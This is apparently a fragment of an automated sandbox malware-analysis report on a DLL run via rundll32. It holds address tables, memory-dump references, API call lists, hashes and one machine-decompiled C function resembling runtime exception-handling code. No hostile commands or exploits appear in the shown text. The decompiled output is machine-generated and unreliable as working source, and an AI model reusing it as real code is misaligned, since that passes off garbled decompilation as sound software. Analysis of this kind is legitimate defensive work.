                    0x6ffa25b9
                    0x6ffa25ba
                    0x6ffa25bc
                    0x6ffa25be
                    0x6ffa25be
                    0x00000000
                    0x6ffa25b0
                    0x6ffa2580
                    0x6ffa2583
                    0x6ffa2585
                    0x6ffa2597
                    0x6ffa2597
                    0x6ffa259a
                    0x6ffa259c
                    0x6ffa259c
                    0x6ffa259d
                    0x6ffa259d
                    0x6ffa25a3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa2587
                    0x6ffa2587
                    0x6ffa2587
                    0x6ffa258e
                    0x00000000
                    0x00000000
                    0x6ffa2590
                    0x6ffa2590
                    0x6ffa2591
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa2591
                    0x6ffa2593
                    0x6ffa2595
                    0x6ffa25a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa25a8
                    0x00000000
                    0x6ffa2595
                    0x6ffa2507
                    0x6ffa250a
                    0x6ffa250d
                    0x00000000
                    0x00000000
                    0x6ffa250f
                    0x6ffa2511
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa2511
                    0x6ffa24d6
                    0x6ffa24d8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6FFA2546
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: MemoryQueryVirtual
                    • String ID:
                    • API String ID: 2850889275-0
                    • Opcode ID: 3d9b1a5ad9c647021a4abc2868f82dfcc30f40fea0bbb9016e0e7a22ea76e576
                    • Instruction ID: 90f3507f325a2d6ff1c86a160074714cdcc9dff5daceddd9ce05b69f8bc7f544
                    • Opcode Fuzzy Hash: 3d9b1a5ad9c647021a4abc2868f82dfcc30f40fea0bbb9016e0e7a22ea76e576
                    • Instruction Fuzzy Hash: 0B61C031755602CFDB1ACF2AD9E079933F5FF85714B20817AD816CB2A4EB73E8828650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000EEA1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 31f6e96a2df7f0376f5b90bea5a2bd87dd88efd779f5d7f0c60802a4847d05e3
                    • Instruction ID: f48b805ddf8587c33136493ffd3a8240debb2e16eec1139d9c37d0d24868cf8f
                    • Opcode Fuzzy Hash: 31f6e96a2df7f0376f5b90bea5a2bd87dd88efd779f5d7f0c60802a4847d05e3
                    • Instruction Fuzzy Hash: 4F41A6B580425DAFEB10DF69CC89AEEBBB9AF45614F1442EDE40DE3201DB359E858F10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70011EB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • EnumSystemLocalesW.KERNEL32(70011FD6,00000001,00000000,?,-00000050,?,70012604,00000000,?,?,?,00000055,?), ref: 70011F22
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 58c50ea9e91f0ead26990e61c9d0e794f2cdfa18ff198236aa2d6400ef3e1334
                    • Instruction ID: de4f0d2f4ccb7c30b0b512e8ce4fb64abb5b641bcede3e470d2fc57b8660e820
                    • Opcode Fuzzy Hash: 58c50ea9e91f0ead26990e61c9d0e794f2cdfa18ff198236aa2d6400ef3e1334
                    • Instruction Fuzzy Hash: 3211A3362047069FDB189F7989916AEB7E2FB80668B14442CE98787B40E3716943C740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70011F4B Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • EnumSystemLocalesW.KERNEL32(70012229,00000001,?,?,-00000050,?,700125C8,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 70011F95
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 7d55dab1a620617b54d7bacab5b71714081cf79da7eff1be03cd96e49b8e72a6
                    • Instruction ID: 7c047649852938bb4a07b6a0609b902fe1d0cdbb84055eac41721dde380f5a16
                    • Opcode Fuzzy Hash: 7d55dab1a620617b54d7bacab5b71714081cf79da7eff1be03cd96e49b8e72a6
                    • Instruction Fuzzy Hash: A9F04C323043055FD7094F75E8846AE7BE2EF80778B14443CF9464B690C771AC42C600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70009925 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 70006CEC: RtlEnterCriticalSection.NTDLL(-000EC664), ref: 70006CFB
                    • EnumSystemLocalesW.KERNEL32(70009918,00000001,70045F00,0000000C,70009D05,00000000), ref: 7000995D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: f08147566c04b759462f4a4a57da4f3004185092c7c4d8f27bd9013595f28288
                    • Instruction ID: 953109906e3d3f6c5bbd161f3d0b974d822db8dc1282a4d31d1d4618b06feb4e
                    • Opcode Fuzzy Hash: f08147566c04b759462f4a4a57da4f3004185092c7c4d8f27bd9013595f28288
                    • Instruction Fuzzy Hash: A3F03732A44204EFE700DF99D881B9D77B0FB45B32F20456AF8149B2A1CB7659408B41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70011E65 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • EnumSystemLocalesW.KERNEL32(70011DBE,00000001,?,?,?,70012626,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 70011E9C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 95992fcd694a572e76b77485a018ff2750b466a0a561b229b727339e9d7581b2
                    • Instruction ID: e368fc46dd1b0dadf24caabc27884f615e2eee6d8e838f4e1d6a76bd41f283ca
                    • Opcode Fuzzy Hash: 95992fcd694a572e76b77485a018ff2750b466a0a561b229b727339e9d7581b2
                    • Instruction Fuzzy Hash: 5EF0EC3630010657DB099F75D9457AE7FF5EFC1A30B064058EE068B390C6319C82C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70009E09 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7000B990,?,20001004,00000000,00000002,?,?,7000AF7B), ref: 70009E3D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 7c3fb84d636dfe2f33d0213cc7fbcfcbdcfd7cb12ec36cb2d00e75e4562734f8
                    • Instruction ID: c95cb7f3a2a632b913c763baa9613c0086f8547e971b59b86df26cc9dd58a7f6
                    • Opcode Fuzzy Hash: 7c3fb84d636dfe2f33d0213cc7fbcfcbdcfd7cb12ec36cb2d00e75e4562734f8
                    • Instruction Fuzzy Hash: 07E04F32540118BFEF129F61DC08AAE3F6AEF45B70F108010FD0966221CB729E21AAD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA2274 Relevance: .1, Instructions: 77COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E6FFA2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6FFA23DB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6FFA2495(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6FFA2380(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6FFA23DB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6FFA2477(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                    0x6ffa2278
                    0x6ffa2279
                    0x6ffa227a
                    0x6ffa227d
                    0x6ffa227f
                    0x6ffa2282
                    0x6ffa2283
                    0x6ffa2285
                    0x6ffa2286
                    0x6ffa2287
                    0x6ffa228a
                    0x6ffa2294
                    0x6ffa2345
                    0x6ffa234c
                    0x6ffa2355
                    0x6ffa229a
                    0x6ffa229a
                    0x6ffa22a0
                    0x6ffa22a6
                    0x6ffa22a9
                    0x6ffa22ac
                    0x6ffa22b0
                    0x6ffa22b5
                    0x6ffa22ba
                    0x6ffa233a
                    0x00000000
                    0x6ffa22bc
                    0x6ffa22bc
                    0x6ffa22c8
                    0x6ffa22ca
                    0x6ffa2325
                    0x6ffa2325
                    0x6ffa232b
                    0x00000000
                    0x6ffa22cc
                    0x6ffa22db
                    0x6ffa22dd
                    0x6ffa22de
                    0x6ffa22df
                    0x6ffa22e2
                    0x6ffa22e2
                    0x6ffa22e4
                    0x00000000
                    0x6ffa22e6
                    0x6ffa22e6
                    0x6ffa2330
                    0x6ffa22e8
                    0x6ffa22e8
                    0x6ffa22ec
                    0x6ffa22f4
                    0x6ffa22f9
                    0x6ffa22fe
                    0x6ffa230a
                    0x6ffa2312
                    0x6ffa2319
                    0x6ffa231f
                    0x6ffa2323
                    0x00000000
                    0x6ffa2323
                    0x6ffa22e6
                    0x6ffa22e4
                    0x00000000
                    0x6ffa22ca
                    0x6ffa233e
                    0x6ffa233e
                    0x6ffa233e
                    0x6ffa22ba
                    0x6ffa235a
                    0x6ffa2361

                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction ID: 97f4ce6711ee7d81dea9afc1dbd3decbe7208f836cc6894add6e320c2c2e6d5a
                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction Fuzzy Hash: B121C432A00704DBD700DF69C8C09ABB7A5FF49350B4581A9D8599B245DB32FA15C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7004A4A3 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7004a000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                    • Instruction ID: 9ad0f6642d70298a358e6af5b5da2e682fde531b1adde0a70d030f1ba756e1e6
                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                    • Instruction Fuzzy Hash: 671181733405009FD754CE59EC81EAA73EAEBDA630725806AED04CB305D676EC51C7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7004A89C Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7004a000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                    • Instruction ID: 06a0a3fa1bca52f641daa0c10f05c7c741a07ee23042c63e25862fa1379e921a
                    • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                    • Instruction Fuzzy Hash: 540104723042458FD719CB18D98496EB7F9EBC3A34B15907EE447C3615D520EC46C924
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000EB9A Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6fca37d7889c3a260593bbad1d581110a8fd693c346d4737e753c4759e39e5a5
                    • Instruction ID: ff2a4e933308082384f323ee8e5b5f41b7192e1a6095169e81ac85e9c3d992c6
                    • Opcode Fuzzy Hash: 6fca37d7889c3a260593bbad1d581110a8fd693c346d4737e753c4759e39e5a5
                    • Instruction Fuzzy Hash: E0E08C32915268EBCB10CB88C900D8EB3FCEB44E64B21409AB502E3101C370EE40C7C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFFF0C0 Relevance: 54.3, APIs: 36, Instructions: 284COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF179
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF188
                    • char_traits.LIBCPMTD ref: 6FFFF194
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1B0
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1C5
                    • char_traits.LIBCPMTD ref: 6FFFF1D7
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1E6
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1F5
                    • char_traits.LIBCPMTD ref: 6FFFF201
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF21D
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF22C
                    • char_traits.LIBCPMTD ref: 6FFFF238
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF247
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF25C
                    • char_traits.LIBCPMTD ref: 6FFFF26E
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                    • String ID:
                    • API String ID: 1941806930-0
                    • Opcode ID: d3a7509486b76081470c7a518e2d4ac50561db21e1814540b1f1cbe54e7e4f5c
                    • Instruction ID: 91f29b3126bf8f0ec511e09867febdb1999827a47b67f2d103a68876175ddc61
                    • Opcode Fuzzy Hash: d3a7509486b76081470c7a518e2d4ac50561db21e1814540b1f1cbe54e7e4f5c
                    • Instruction Fuzzy Hash: E8C1067460110EEFCB04DF98C9E1C9E7776AF88348B548658E9059B2B4DF30AE66DBD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70006EE3 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: a9824216ead9bd280c27b5276f1881a77e5a4c20b47eb11c04cb6e4761f6d705
                    • Instruction ID: 272d202b8f988d8038302b157d84eb41cce39a5a0ea54de91ceb8be01c934ed3
                    • Opcode Fuzzy Hash: a9824216ead9bd280c27b5276f1881a77e5a4c20b47eb11c04cb6e4761f6d705
                    • Instruction Fuzzy Hash: 2AD18071D002059FEB11CFB9C885BEEBBF6BF08720F14416DE49AA7282D779A945CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 700106A3 Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 700106C0
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 700106D2
                    • _free.LIBCMT ref: 700106E4
                    • _free.LIBCMT ref: 700106F6
                    • _free.LIBCMT ref: 70010708
                    • _free.LIBCMT ref: 7001071A
                    • _free.LIBCMT ref: 7001072C
                    • _free.LIBCMT ref: 7001073E
                    • _free.LIBCMT ref: 70010750
                    • _free.LIBCMT ref: 70010762
                    • _free.LIBCMT ref: 70010774
                    • _free.LIBCMT ref: 70010786
                    • _free.LIBCMT ref: 70010798
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f97cc94d2ea3b08f866f1e80c0d6ec52c0edfb6720023a01d931fff0eb92fdf2
                    • Instruction ID: 5be9ad8ea7f0c4f679f7da0f494f30bb4a7686d66051d5ad374a82ff352607b7
                    • Opcode Fuzzy Hash: f97cc94d2ea3b08f866f1e80c0d6ec52c0edfb6720023a01d931fff0eb92fdf2
                    • Instruction Fuzzy Hash: 3621CD729086019FE624DB69E98DD1E77FABB16B307714809F04ED7661CB74F8C08A29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70010168 Relevance: 18.1, APIs: 12, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 700101A1
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106C0
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106D2
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106E4
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106F6
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010708
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 7001071A
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 7001072C
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 7001073E
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010750
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010762
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010774
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010786
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010798
                    • _free.LIBCMT ref: 700101C3
                    • _free.LIBCMT ref: 700101D8
                    • _free.LIBCMT ref: 700101E3
                    • _free.LIBCMT ref: 70010205
                    • _free.LIBCMT ref: 70010218
                    • _free.LIBCMT ref: 70010226
                    • _free.LIBCMT ref: 70010231
                    • _free.LIBCMT ref: 70010269
                    • _free.LIBCMT ref: 70010270
                    • _free.LIBCMT ref: 7001028D
                    • _free.LIBCMT ref: 700102A5
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: c47b5f8f1398932e329f591e448691dbf4b7ebacda39726e9c4bb4b9a9c59c11
                    • Instruction ID: e899c0f5af7b323e78e8686e828945d8871133d87de415e42b4181add55065cd
                    • Opcode Fuzzy Hash: c47b5f8f1398932e329f591e448691dbf4b7ebacda39726e9c4bb4b9a9c59c11
                    • Instruction Fuzzy Hash: A2314E31A04202AFEB219B75D949B5E77FABF00B74F218429F49AD7151DBB8BD80CB11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70009582 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 70009598
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 700095A4
                    • _free.LIBCMT ref: 700095AF
                    • _free.LIBCMT ref: 700095BA
                    • _free.LIBCMT ref: 700095C5
                    • _free.LIBCMT ref: 700095D0
                    • _free.LIBCMT ref: 700095DB
                    • _free.LIBCMT ref: 700095E6
                    • _free.LIBCMT ref: 700095F1
                    • _free.LIBCMT ref: 700095FF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 05c1a3bbcdd2f1419836cacbb61ec53f82d82ae4fff0d2ac9c6276039de2dbe6
                    • Instruction ID: 97089b3469df367ce5ff4be50e93fad7a256b0b6bd4046ef705e6f1e16815efe
                    • Opcode Fuzzy Hash: 05c1a3bbcdd2f1419836cacbb61ec53f82d82ae4fff0d2ac9c6276039de2dbe6
                    • Instruction Fuzzy Hash: 5421F876904108BFDB11DFA4C985DEE7FB9BF08620F0141A6F5099B122EB35EA44CF81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70010BC1 Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 30f2ca76489c21f221c9ebf10f39c900f917439cb00bee90209806db1434aaa1
                    • Instruction ID: 6b9503c9cb6399f6a15e0d4d227aca03bdc491feb121b3ee175313bc9ae0cbb8
                    • Opcode Fuzzy Hash: 30f2ca76489c21f221c9ebf10f39c900f917439cb00bee90209806db1434aaa1
                    • Instruction Fuzzy Hash: E561D5729046069FE721CF78D841B9E77F9FB45B30F204559E989DB281EBB0BD408B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFFF410 Relevance: 13.6, APIs: 9, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 6FFFA6C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFA6D1
                      • Part of subcall function 6FFFA6C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFA6DE
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF434
                      • Part of subcall function 6FFFF0C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF179
